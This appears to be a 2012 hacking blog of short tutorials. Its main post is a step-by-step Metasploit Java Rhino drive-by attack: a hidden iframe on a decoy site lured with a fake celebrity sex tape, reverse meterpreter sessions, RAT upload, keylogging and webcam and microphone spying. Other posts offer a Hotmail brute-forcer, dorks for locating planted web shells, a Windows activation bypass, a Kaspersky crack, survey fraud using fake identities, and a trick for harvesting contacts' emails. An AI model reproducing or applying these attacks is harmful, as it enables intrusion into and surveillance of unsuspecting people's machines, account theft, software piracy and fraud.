29 March, 2012

Website Logger

These files can be included in your website code and can record who visits your website with a useragent, date, time, ip address, hostname, their current page and their referring page.

Ok First off Create these files

1) log.php // can change the names of the files
2) logfile.txt
3) viewlog.php


I will go through each one step by step so you know what each piece of code means.

First off log.php

PHP Code:
<?php
$ipaddress = $_SERVER['REMOTE_ADDR']; // fetch the users's ip address
$page = "http://{$_SERVER['HTTP_HOST']}{$_SERVER['PHP_SELF']}"; //the current page the user was on
$referrer = $_SERVER['HTTP_REFERER']; // the last page the user was on
$datetime = mktime(); // the DATE of the request
$useragent = $_SERVER['HTTP_USER_AGENT']; // Pretty obvious
$remotehost = @getHostByAddr($ipaddress); // This returns the host name of the Internet host specified by the variable $ipaddress
date_default_timezone_set("Europe/London"); // Sets the Default Timezone, for a list of timezones go to http://php.net/manual/en/timezones.php
$time = date("h:i:s A");
// Create log line
$logline = $ipaddress . '|' . $referrer . '|' . $datetime . '|'. $useragent . '|' . $remotehost . '|' . $page . '|' . $time . '| "';

// Write to log file:
$logfile = 'logfile.txt'; // You can change this to any name you want

// Open the log file in "Append" mode
if (!$handle = fopen($logfile, 'a+')) {
die("Failed to open log file");
}

// Write $logline to our logfile.
if (fwrite($handle, $logline) === FALSE) {
die("Failed to write to log file");
}

fclose($handle);
?>

And thats the Log.php file, Pretty neat, and tidy i think.

Ok if your server doesn't support creating files using scripts, create one manually and set the name as you would in log.php

Now onto viewlog.php
This is where you view your logs, i recommend password protecting this with either .htaccess or additional protection.

PHP Code:
<?php

// Define your username and password
$username = "USERNAME";  // Change Me
$password = "PASSWORD"; // Change Me

if ($_POST['txtUsername'] != $username || $_POST['txtPassword'] != $password) {

?>
<html>
<head>
</head>
<body>
<center>
<h2>Super Secret Control Panel</h2>
<h1>Login</h1>

<form name="form" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
    <p><label for="txtUsername">Username:</label>
    <br /><input type="text" title="Enter your Username" name="txtUsername" /></p>

    <p><label for="txtpassword">Password:</label>
    <br /><input type="password" title="Enter your password" name="txtPassword" /></p>

    <p><input type="submit" name="Submit" value="Login" /></p>

</form>
</center>
</body>
</html>
<?php

}
else {

?>
<?php
$logfile = "logfile.txt";

if (file_exists($logfile)) {

$handle = fopen($logfile, "r");
$log = fread($handle, filesize($logfile));
fclose($handle);
} else {
die ("The log file doesn't exist!");
}


// Seperate each logline
$log = explode("
", trim($log));

// Seperate each part in each logline
for ($i = 0; $i < count($log); $i++) {
$log[$i] = trim($log[$i]);
$log[$i] = explode('|', $log[$i]);
}
// Show a table of the logfile
?>
<html>
<head>
</head>
<body>
<div id="container">
<div id="content">
<table cellspacing="1" cellpadding="1" size="1800px">
<th>IP Address</th>
<th>Referrer</th>
<th>Current Page</th>
<th>Date</th>
<th>Time - GMT</th>
<th>Useragent</th>
<th>Remote Host</th>

<?
foreach ($log as $logline) {
$text = urldecode($logline['1']);
$newtext = wordwrap($text,40,"\n", true);

echo '<tr>';

echo '<td>'. $logline['0'] .'</td>';
echo '<td>'.$newtext.'</td>';
echo '<td>' . $logline['5'] . '</td>';
echo '<td>' . date('d/m/Y', $logline['2']) . '</td>';
echo '<td>' .  $logline['6'] . '</td>';
echo '<td>' . $logline['3'] . '</td>';
echo '<td>' . $logline['4'] . '</td>';


echo '</tr>';

}
?>
</table>
</div>
</div>
</body>
</html>

<?php

}

?>

And that is it.

Upload it to your webserver and make sure log.php is in the root directory of your html/www folder and use the following code to include it in ALL of the web documents you want to record.
PHP Code:
<?
include ('log.php');
?>

And that's it :)

I don't want Reps or whatnot, I just want to help people that have had spammers etc etc onto their site.

Enjoy and reply if you find this helpful :)

Labels:

26 March, 2012

How to hack into a Database and take files.

What will you need?
  • You need basic computer skills such as making new folders.
  • You Need a dos called Wget You can download from HERE
  • You need to have administrative privileges on your computer.

The Tutorial
Step 1: Download Wget from HERE
and put it on the root of your operating system, most people have "C" So go there and make a new folder called wget NO CAPS. Inside only put the dos. (btw the dos doesn't open I will show you how to use it)

Step 2: Open Cmd
In XP go to run and put CMD or command.com
In vista/7 Search for CMD and right click open as Administrator.

[Image: step2e.png]

Step 3: In Cmd put "cd C:\wget" No quotes and if your main drive is not C put it as your main drive.

[Image: step3gj.png]

Step 4: Post this command "wget -r -A.jpg" (Don't press enter) See how it says .jpg, you can make it the extension your trying to get. Right now it would take any file with the extension .jpg and download it. If you changed the command to wget -r -A.html it would get all the html files ect.

[Image: step4y.png]

Step 5: Now after that you can space once and put the website or link/server you want to take from. It will check for safety and certificates if you don't want it too because its a hassle you can put this. --no-check-certificate. So after you put the first command you space you put this then you space again and post the website/link/server and port if you want to get specific.

Step 6: Now you're set! Just press enter and watch the magic happen. You can open another cmd and do another file extension at the same time.

[Image: step5b.png]

Step 7: Now just go to the wget folder on C and open it. There should be a new folder of the website in there. Click on it and thats the files.

[Image: step6o.png]

Labels:

24 March, 2012

How to know someone e-mail address


1. Log in to your Facebook account
2. Send your target a friend request (If you dont have him yet)
3. When he accepts your friend request go to http://www.yahoo.com
4. Then click on "Sign In" (its in the right of the site almost in the top)
5. Click on "Sig In with Facebook"
6. It will redirect you to the Yahoo facebook page/app, click on "allow acces"
7. Go to your Yahoo profile (you are already logged in)
8. Go to your contacts and select "import contacts" there will be appear a option to import contacts from facebook, select it.
9. When its done, you will see their e-mails below their facebook usernames.

Labels:

22 March, 2012

Brute Force Hotmail Accounts (live.com)

Feature

-Brute force multiple windows live accounts at a time ! This is one of the greatest feature of this tool.

Screen Shot

Spoiler 
[Image: 9.jpg]

Instructions

Open the pass.txt file and replace 123456 with you password list[you can add as much as password you want]

Open the email.txt file and replace all mails with your mails.[you can add as much account you want]

Open nBrute force v1.3 and click on start ! No. of threads must not be less than the no. of email & passwords provided.

[To close the program make sure you exit it from task bar]

Download

http://www.mediafire.com/?epxr3w73bb5cb5u

Post on this thread and I will PM you the password, do not PM me.

Virus Scan

File Info

Report date: 2012-03-11 16:20:43 (GMT 1)
File name: brute-hotmail-rar
File size: 31113 bytes
MD5 Hash: 34796a8f76b339a2f56826596d610e96
SHA1 Hash: f63682f66130fc31f9d1e0bf403027e6034f1d29
Detection rate: 0 on 9 (0%)
Status: CLEAN

Detections

Avast -
AVG -
Avira AntiVir -
ClamAV -
Comodo -
Emsisoft -
F-Prot -
Ikarus -
TrendMicro -

Scan report generated by
NoVirusThanks.org

Labels:

[TUT] Java Rhino Exploit Tutorial

Introduction

Ok, The Java-Drive-Bye is dead, simple, its an ineffective way to spread your RATs/Loggers etc but alot of you still insist on cluttering this forum up trying to get java drive byes to work. Im writing this tutorial because there is a better solution, the Java_Rhino exploit. The Java_Rhino exploit is a cross platform, cross browser zero day vulnerability that can be used to exploit remote machines. This tutorial will teach you how to set up the Java Rhino exploit and some of the cool things you can do with the meterpreter payload once your targets have been exploited.

What You Need Before Your Start

A hosting account from x10hosting (Free Website Host) -> http://x10hosting.com/
Download and install metasploit -> http://metasploit.com/
You need to know your public IP address -> http://www.whatsmyip.org/
If you have a router youll need to portforward port 1337 and port 4444 to your local machine.

Metasploit
Ok alot of you were having issues with metasploit, you need to install metasploit then run ./msfupdate.exe to update the exploit database to include the java rhino exploit. Then open msfconsole and run "reload_all" for for the java rhino exploit to become available.

What You Need To Understand

In this tutorial you will set up a small webserver on your local machine on port 1337 that when connected too will launch a malicious Java applet invisibly and exploit the slave. Upon exploitation the slave will connect back to your machine on port 4444 giving you access to the entire machine with the priveledges of the user that has been exploited. This will not work if your behind a router and have not forwarded these port to your local machine, if you havent done this yet stop reading, forward your ports (or connect directly to the internet) and open these ports on your firewall (if your using windows).

Initial Set Up

Ok, to keep this attack invisible i suggest making a mirror site and hosting it on the x10hosting webhosting account you set up in the "What You Need" section of this tutorial, what the website has on it i don't really give a shit. I've been using a facebook knockoff site boasting a Selena Gomez Sex Tape, porn style sites work well for easy victims as i will explain later. So go and set up a site on your x10hosting account, note down your domain name and come back but keep your CPanel open, we will be adding one more peice of code to your sites homepage.

Spoiler of my dummy website - WARNING ADULT

Metasploit Setup

Ok, now we need to set up the Java_Rhino exploit server. So fire up your metasploit console and enter the following commands.

Tell metasploit to use the java rhino exploit


use exploit/multi/browser/java_rhino
Set metasploit to run the server on port on 1337


set SRVPORT 1337

Set the URL of the page that will be doing the exploiting to something more memorably

set URIPATH exploit

Use a reverse TCP meterpreter payload so we can have fun with the slave

Code:
set PAYLOAD java/meterpreter/reverse_tcp

Set the connect back payload to connect back to your public IP

Code:
set LHOST {PUT YOUR PUBLIC IP HERE}

Now run the configuration

Code:
exploit

Here is a sample output of what you should see

Code:
msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set SRVPORT 1337
SRVPORT => 1337
msf  exploit(java_rhino) > set URIPATH exploit
URIPATH => exploit
msf  exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf  exploit(java_rhino) > set LHOST XXX.XXX.XXX.XXX
LHOST => XXX.XXX.XXX.XXX
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[-] Handler failed to bind to XXX.XXX.XXX.XXX:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:1337/exploit
[*]  Local IP: http://192.168.2.2:1337/exploit
[*] Server started.
msf  exploit(java_rhino) >

Ok now your exploit server is listening on port 1337. You just need to get people to connect to it. So edit this following peice of code and put your public IP address in it:

Code:
<iframe src="http://[YOURIPHERE]/exploit" width=0 height=0 border=0 size=0></iframe>

So you should end up with something like this:

Code:
<iframe src="http://123.123.123.123:1337/exploit" width=0 height=0 border=0 size=0></iframe>

Copy this into the HTML on the dummy website you created on your x10hosting account. So now when ever someone views your dummy website, the iframe will force their browser to invisibly connect to your exploit server and metasploit will run the Java_Rhino exploit against their browser. Brilliant.

Getting The Clicks

Ok this is where you need to do the leg work and why i recommeneded using an adult themed dummy website inorder to get clicks.

My two personal favrouties that i love to farm with the Java_Rhino exploit are 4chan.org and Motherless.com

Go to those sites and in the Motherless boards post a picture of a hot chick and then post some comment about a sexy video on your dummy website and post the link for them to click on. This will get you about 30 minuites of traffic before its either removed or pushed to the bottom of the boards.

Do the same with the 4Chan.org adult section, you can copy and paste the post you used on Motherless.com but make sure you upload a picture too to catch peoples attention. Make the post short and to the point so the user reads it and clicks the link. I have been using this:

Code:
"Finally someone has found a Selena Gomez sex tape - this is the sexiest thing i have ever seen! -> http://link to my dummy site.com"

Along with one of those photoshopped pictures of a naked selena gomez that google just loves to turn up. In doing this you will get about 1 hours worth of traffic at about 10 clicks a minuite, which is enough for what were doing. Remember for every person that clicks through their browser will be exploited because of the iframe we put on the dummy website. You can test it yourself and visit your dummy website, metasploit should give you some output like this:

Code:
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from XXX.XXX.XXX.XXX:42045...
[*] Sending Applet.jar to XXX.XXX.XXX.XXX:42048...

Brilliant, now you need to watch the clicks come rolling in from 4Chan and Motherless from all those porn hungry weirdos. Your screen will fill up with connection attempts quickly and will look like this:

Code:
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50240...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50241...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50242...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50243...
[*] Sending Applet.jar to 74.36.201.221:61621...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61635...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 69.114.123.235:1200...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 77.224.112.18:3785...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 124.182.236.181:62576...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.141.166.139:51625...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11063...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11072...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11073...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11074...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11075...

If your not getting connections like this but when you go to your dummy site you get a connection means noone is clicking your link, so you should go back to the boards and post some new more tempting ones. I have also seen people hack sites and put their iframes to a no-ip to get days worth of legitmate traffic into their java rhino exploit, this is just a quick overview but the more places you post/spam your dummy site link the better results youll have. I posted this on a few forums last night and collected over 100 sessions in 2 hours. Dont be disapointed if you only get a few sessions on your first try, its like fishing, you have to find the rigt bait line that works for you.

Leave this running for about 5-10 minuties to get your first sessions, Your looking for lines that look like this:

Code:
[*] Sending stage (28469 bytes) to 80.176.86.190
[*] Meterpreter session 1 opened (192.168.2.2:4444 -> 80.176.86.190:56358) at Sat Dec 24 16:56:17 +0000 2011

This means a session has been created between you and the slave, you can view all the sessions that have been created by issuing the "sessions" command:

Code:
Active sessions
==

  Id  Type  Information    Connection
  --  ----  --    --
  1   meterpreter java/java  akoltowski @ ACLAPTOP  192.168.2.2:4444 -> 80.176.86.190:56358
  2   meterpreter java/java  akoltowski @ ACLAPTOP  192.168.2.2:4444 -> 80.176.86.190:56420

To connect to one of these sessions use the "sessions -i <id>" command - the following example shows my connecting to session number 1:

Code:
sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Using Your Sessions

A meterpreter session gives you alot of control over the remote slave. You can snapshot their webcam, spawn a shell, screen shot their computer, log their keystrokes. Here is a full list of all the meterpreter commands you can use to fuck with your slave. You can get this by issuing the "Help" command.

Code:
Core Commands
==

    Command  Description
    --  --
    ?  Help menu
    background    Backgrounds the current session
    bgkill    Kills a background meterpreter script
    bglist    Lists running background scripts
    bgrun  Executes a meterpreter script as a background thread
    channel  Displays information about active channels
    close  Closes a channel
    detach    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit    Terminate the meterpreter session
    help    Help menu
    info    Displays information about a Post module
    interact    Interacts with a channel
    irb  Drop into irb scripting mode
    load    Load one or more meterpreter extensions
    migrate  Migrate the server to another process
    quit    Terminate the meterpreter session
    read    Reads data from a channel
    resource    Run the commands stored in a file
    run  Executes a meterpreter script or Post module
    use  Deprecated alias for 'load'
    write  Writes data to a channel

Stdapi: File system Commands
==

    Command  Description
    --  --
    cat  Read the contents of a file to the screen
    cd    Change directory
    del  Delete the specified file
    download  Download a file or directory
    edit    Edit a file
    getlwd  Print local working directory
    getwd  Print working directory
    lcd  Change local working directory
    lpwd    Print local working directory
    ls    List files
    mkdir  Make directory
    pwd  Print working directory
    rm    Delete the specified file
    rmdir  Remove directory
    search  Search for files
    upload  Upload a file or directory

Stdapi: Networking Commands
==

    Command  Description
    --  --
    ipconfig  Display interfaces
    portfwd  Forward a local port to a remote service
    route  View and modify the routing table

Stdapi: System Commands
==

    Command  Description
    --  --
    clearev  Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute  Execute a command
    getpid  Get the current process identifier
    getprivs  Attempt to enable all privileges available to the current process
    getuid  Get the user that the server is running as
    kill    Terminate a process
    ps    List running processes
    reboot  Reboots the remote computer
    reg  Modify and interact with the remote registry
    rev2self  Calls RevertToSelf() on the remote machine
    shell  Drop into a system command shell
    shutdown  Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo  Gets information about the remote system, such as OS

Stdapi: User interface Commands
==

    Command  Description
    --  --
    enumdesktops   List all accessible desktops and window stations
    getdesktop  Get the current meterpreter desktop
    idletime  Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot  Grab a screenshot of the interactive desktop
    setdesktop  Change the meterpreters current desktop
    uictl    Control some of the user interface components

Stdapi: Webcam Commands
==

    Command  Description
    --  --
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

I know alot of you are big into RATing and Botnets. So heres how to upload and execute your server .exe to the remote host.

First place your server.exe in the same directory as the msfconsole. You can find this directory at anytime by issuing the "lpwd" command from inside your meterpreter sessions.

Next change directory on your slave to C:\Temp by issueing the CD command:
Code:
cd C:\Temp

By changing directory to the C:\Temp (sometimes lowercase C:\temp) directory ensures we will have the right priveldges to upload and execute our server.exe.

Now upload your server.exe:

Code:
upload server.exe

You will get an output that looks like this:

Code:
meterpreter > upload server.exe
[*] uploading  : server.exe -> server.exe
[*] uploaded   : server.exe -> server.exe

Now your server.exe is on the remote host you can check it is there by issuing the "ls" command - some AV's might delete it so its worth checking:

Code:
Listing: C:\Temp
==

Mode    Size  Type  Last modified  Name
----    ----  ----  --  ----
.. output ommited
100776/rwxrwxrw-  0  fil   Sat Nov 19 10:50:28 +0000 2011  1D4F.tmp
100776/rwxrwxrw-  0  fil   Tue Nov 22 19:22:00 +0000 2011  24C0.tmp
40776/rwxrwxrw-   0  dir   Mon Dec 12 14:18:57 +0000 2011  msohtml1
40776/rwxrwxrw-   0  dir   Fri Dec 09 14:39:27 +0000 2011  msohtml
40776/rwxrwxrw-   0  dir   Sat Dec 24 16:58:53 +0000 2011  mozilla-media-cache
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  ia64
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  server.exe << -- WIN
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  i386
40776/rwxrwxrw-   0  dir   Sat Dec 24 17:00:11 +0000 2011  hsperfdata_akoltowski
40776/rwxrwxrw-   0  dir   Sat Dec 24 12:30:20 +0000 2011  WPDNSE
40776/rwxrwxrw-   0  dir   Thu Dec 08 16:05:02 +0000 2011  VBE
..output omitted

If it isn't in /Temp then try uploading it the the users documents folder instead, because each user can write and execute to their home directory.

You can now execute your server.exe by issuing:

Continued on next post
Code:
execute -f server.exe -m -H

The flags will execute it from memory and hide the process from the slave.

You can then issue the "screenshot" command to screenshot the users computer to see if their AV detected it:

Code:
meterpreter > screenshot
Screenshot saved to: /home/solaris/hFOnwohk.jpeg

Meterpreter will open the screenshot in a webbrowser for you to view, as you can see my slave is watching some sleezy porn video:

Screenshot:
Spoiler
[Image: h_FOnwohk.jpg]

As you can see their AV has detected the execution so out server is now installed on the remote user, congratulations.

Other Fun Things

To get a CMD Shell (usefull)
Code:
meterpreter > cd C:\Windows\System32
meterpreter > execute -f cmd.exe -i -H

Log Keystrokes

Code:
meterpreter > keyscan_start

(wait 10 mins)

meterpreter > keyscan_dump
meterpreter > keyscan_stop

Record Microphone
Code:
meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /home/solaris/aabHbPGz.wav

Shutdown The slave
Code:
meterpreter > Shutdown

Show the victims webcams
Code:
meterpreter > webcam_list

Photo victims webcam
Code:
meterpreter > webcam_snap <webcam id>

Get remote system info
Code:
meterpreter > sysinfo

Go back and select another session without killing this one
Code:
meterpreter > background
meterpreter > sessions
meterpreter > sessions -i <id>

Errors You Will Get

The exploit isn't perfect, you will get errors on certain sessions, here is a common one:
Code:
[-] Operation failed: 1

You'll get this when issuing a command that is either wrong, unable to execute on the OS or you dont have the privs for it. The only way i have found to get round this on some hosts is to change to the C:\Temp directory, try again, if that doesn't work issue:
Code:
meterpreter > getprivs
meterpreter > ps

(will give you an output of the running processes on the machine, copy the id for the srvhosts.exe process)

meterpreter > merge <the id you just copied>

This will merge the meterpreter process with srvhosts.exe which runs with admin privs so should increase your priveledge level, it works about 20% of the time.

Labels:

16 March, 2012

Windows XP “You may be a victim of software counterfeiting

After installing your genuine copy of Microsoft Windows XP you are prompted with a “Your software is counterfeit” error message at startup. Even after visiting the www.microsoft.com/genuine/ site and validating, you still get the above message popping up after 2 or 3 boots. There is an easy solution to this and I would like you to follow the steps below to fix the issue.
1. C:\Windows\Downloaded Program Files
  • Within that folder, remove any files or folders associated with .WGA
2. Safe Mode
  • Reboot your computer and as soon as Windows logs off, start repeatively tapping the F8 Key on your keyboard.
  • As soon as you see the Windows Advanced Startup options select Safe Modewithin Safe Mode get yourself into these folders…
  • C:\Windows\System32 (Rename wgatray.exe to wgatrayold.exe)
  • C:\Windows\System32\dllcache (Rename wgatray.exe to wgatrayold.exe)
    Note: Dllcache is a hidden folder, to view hidden folders do the following, go to Start, Control Panel, Folder Options,
    Select the view Tab and under the Hidden Files option, select Show hidden files and folders
3. Safe Mode Registry
  • Click on Start, Run and within the open dialog box type regedit and click OK.
  • Within the Registry Editor navigate your self to
    HKEY_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\WGALOGON
  • Right Click and Export the WGALOGON Folder (this should be saved onto your machine for backup purposes)
  • After Exporting the folder, DELETE the WGALOGON folder
  • After deleting close all applications and Restart your machine back to Normal Mode
  • Get into the site above and manually re-validate your copy of Windows.
  • After being prompt of a successful validation, Restart your Machine.

Labels:

Find Shells Using "Index of /sh3llZ" Google Dork

shells
After getting the admin access hackers are Uploading their control penal (that’s call shell). Shell allows hackers to hack/deface the website and using the shell hacker can get root access. Sometime hackers left the shell in vulnerable sits. And here is some Google dorks which helps you to find the shells.

intitle:index of/sh3llZ

"Index of /sh3llZ"

"/sh3llZ/uploadshell/uploadshell.php

You can see in the above figure there are some shells like c99.php , c100.php etc. using that shell u can upload your shell and you can also deface that site.

Labels:

15 March, 2012

How To Convert Facebook Into Pinterest Using Friendsheet Application

Pinterest is virtual Syled Social networking site which is used for sharing photos of interior design . friendsheet is an facebook application which application help your facebook will looking like as pinterest . and also shows  all public facebook photos in a compact pannel .


Trick To Convert Facebook Into Pinterest Using Friendsheet Application -


1. First You Go To Friendsheet Application and Then Click On Login with facebook button

2. Now Click on The Allow button






3. in Next Step You have given the permission . then friendsheet will show public facebook photos .


4. For Hide Comments From the all photos . go to setting menu at the top and mark the check box " Hide Comments "

if you want customize additional setting of friendsheet then you can also do it .

That's It

Labels:

12 March, 2012

Kaspersky World Activator v1.3.2.94


 Kaspersky World v1.3.2.94 | 1.1 MB
Kaspersky World - A complete solution for work with Kaspersky Lab antivirus products. Allows you to load keys, trial reset, etc.

What it can do?
- Download keys for Kaspersky Lab products;
- Activate Your Kaspersky using. Key-file;
- Extract original key;
- Manage Kaspersky's registry data;
- Remove Kaspersky's activation;
- Remove trial-notifications.

System requirements
Operating system:
- Windows 2000
- Windows ME,
- Windows XP,
- Windows Server 2003
- Windows Vista,
- Windows 7
- Windows Server 2008;

Supported Kaspersky Lab products:
- Kaspersky Antivirus 6,
- Kaspersky Antivirus 7,
- Kaspersky Antivirus 2009
- Kaspersky Antivirus 2010
- Kaspersky Antivirus 2011,
- Kaspersky Antivirus 2012
- Kaspersky Internet Security 6
- Kaspersky Internet Security 7
- Kaspersky Internet Security 2009,
- Kaspersky Internet Security 2010
- Kaspersky Internet Security 2011,
- Kaspersky Internet Security 2012
- Kaspersky Pure (Crystal),
- Kaspersky Endpoint Security,
- Kaspersky Small Office Security,
- Kaspersky Antivirus for Windows Workstations.

Version history 1.3.2.94
- Added startpage wizard settings (for first program start);
- Included Offline mode launcher;


Labels:

11 March, 2012

Micromax Brings MMX 353G Data Card Preloaded with Google Chrome



                 Thoug 3G in India is yet to be popular there is high demand for 3G enabled data cards as people are using these with 2G data services which comes cheap.
Apart from Huawei and ZTE, many Indian companies have already launched own-branded unlocked 3G data cards. Micromax, one of the leading indigenous Indian handset companies has launched a new model under its 3G-HSPA data card portfolio.
The new HSPA data card from Micromax is named as 353G, and supports upto 7.2 Mbps HSDPA & upto 5.76 Mbps HSUPA as per 3GPP Release 6 and backwardly compatible with UMTS, EDGE and GPRS i.e. the data card will work on slower 2G networks as well. The data supports network frequency bands of 850/900/1800/1900/2100 MHz.
The new 353G is powered with Qualcomm MSM6290 chipset, and supports setup mode of plug and auto installation with zero CD installation. 353G also includes pre-loaded Google’s fast Chrome browser to offer best browsing experience to its users. It supports USB 2.0 high speed mode and AT Interface of 3GPP TS 27.005/3GPP TS27.007.
Apart from the data functionality with auto APN management 353G offers complete support of SMS, Contacts/Phonebook, Voice calls and USSD; simultaneous data and sms will work on it.
It also has a microSD slot to be double as maximum 16GB USB drive. This 3G data card supports all versions of Windows while Mac OS support limited to Intet CPU only.Currently it is available at Rs. 2000 as retail price.
Micromax diversifies its operations to South East Asia, Middle East and Latin America.  The new 3G dongle is factory unlocked and supports more frequencies to provide seamless roaming in most of the countries.

Labels:

08 March, 2012

How to Download From $harecash/spam or anyother Survey [Any Country][Free]

today I would like to share this tutorial on how to Successfully complete a survey and Download that file from anywhere around the world for FREE.


NOTE:
TO all coders, Programmers, contributors: who use $harecash links to earn for their hardwork: Next time you give out a spam link, you could add a link to this Thread, so that people can successfully download and you can earn some cash.

TO all Downloaders, newbies, leechers: Just follow the Tutorial and i am sure you can download the file successfully.

Ok so lets Jump on to the tutorial...

Things you need:

1. $harecash or anyother survey link ( Obviously Roflmao )
2. some way to change your ip to an US IP. (will discuss later)
3. Fake Name Generator.
4. A Google account.
5. And some patience.

Steps To Complete the Survey:
Step1: Changing your IP address into a US Ip address. To do this there are many methods but i will show you a 4 methods to Do this.

1. Using a Free VPN ( Virtual Private Network ) without any software installation.

Few of Free VPNs :
  • Best Free VPN [pptp server: bfvpn.com]
  • Real-VPN [pptp server: us.real-vpn.com] ( need to register to get login details )
  • USip ( Follow instructions on the Website )
Setting up VPN network:
- From Windows 7 Desktop, click Start - Control Panel to open the control panel;
- Click Network and Internet, click Network and Sharing Center;
- Click Set up a new connection or network, then Connect to a workplace;
- Select option No, create a new connection, then Use my Internet connection (VPN);
- In the Connect to a workplace window, fill fields as below:
[Image: windows-7-vpn-setup-guide.png]

- In Next window, use Username in User name field, and use password in the Password field, then click "Connect" button to start the free VPN connection! you have successfully changed to a US IP.
[Image: windows7-pptp-vpn-configuration.png]

2. Using a Free VPN ( Virtual Private Network ) with downloadable software installation.

Few of Free VPNs :
3. Using IP changing Softwares:
I use Real Hide Ip v4.1.1.6, it is fast and can be used to change ips to different countries.

screenshot: Real hide IP screenshot

Real Hide Ip v4.1.1.6 with Crack : Download Here
Virus Scan: http://www.virustotal.com/file-scan/repo...1314571001

4. Manually change IP using Private Socks or Highly Anonymous proxies:

Things you need:
- Firefox browser
- FoxyProxy Addon or
- ProxyTool Addon [ You can add a List of Proxies at once in this Addon ]
- US Proxies

You can get Loads of Proxies daily updated in the HF Proxies n Socks Subforum. or from this site : Hide My ass
[ NOTE: Do not Use Proxies from CoDeeN CDN Network, most of the proxies with Port starting with 31 are CoDeeN proxies. you cannot complete surveys using this proxy ]
Just Use a US Proxy to change your IP into a US IP.

Step 2: Set up a Google Voice Account to get a Real US Phone Number.

First, you need to Generate a Fake Name and US Address.
you can Do that using http://www.fakenamegenerator.com or Using this application.

Fake Name Generator : Download here [ Credits: Nathan72389 ]
Virus Scan: http://www.virustotal.com/file-scan/repo...1314571705

Setting up Google voice account:
- Check that you have a US ip before you further proceed. Check you IP here
- Go to this link: Google Voice
- Login with your Google Username and Password.
- Click on the "I want a New Number" button
- Enter a Zip code from the fake name generator, and press search. If it says no Numbers found, Use another zip.
[Image: g3.png]

- keep trying till you get a Phone number, like below. select a Number and Press Continue.
[Image: g4.png]

- Copy and Save this Number for Future Use.
[Image: g5.png]

[Note: you can further continue with the steps, you will be asked to enter your phone number to redirect all msg to your phone. by doing this you can keep this Google Phone number permanently for any further Use.]

Step 3: Lets Download This SHITcash Hehe

Now Go to the $harecash URL you want to download.
If you have a Mirror Link, like Fileml.com etc you can use this $harecash Reflector to convert it to the Orginal Link.

$harecash Reflector: Download here
Virus Scan: http://www.virustotal.com/file-scan/repo...1314570978

-Click on a Survey which doesnt require you to confirm your Phone number.
Some of the Surveys which will work:
  • Who is better? mcdonalds or burger king , [Any survey related to fast food.]
  • Which simpson,southpark,familyguy character are you?

- Fill in all the details, and for the Phone number USE the Google Voice number you generated above.
- After Filling up the Details, go to the $harecash download Tab and WAIT.
- You need to Wait till the $harecash page automatically refreshes more than twice [ WAIT for atleast 5 MINS ]. You Should Successfully unlock your File. Yeye


If it still doesn't download Try another Survey with the SAME details.

You Can use this method to Download your Own file to Earn some extra cash from $harecash. Please Dont abuse this method.. Download just 2 or 3 times max per day. [I wont be Responsible in anyway if your Account gets Banned or Blocked, Use at your Own Risk ]

Labels: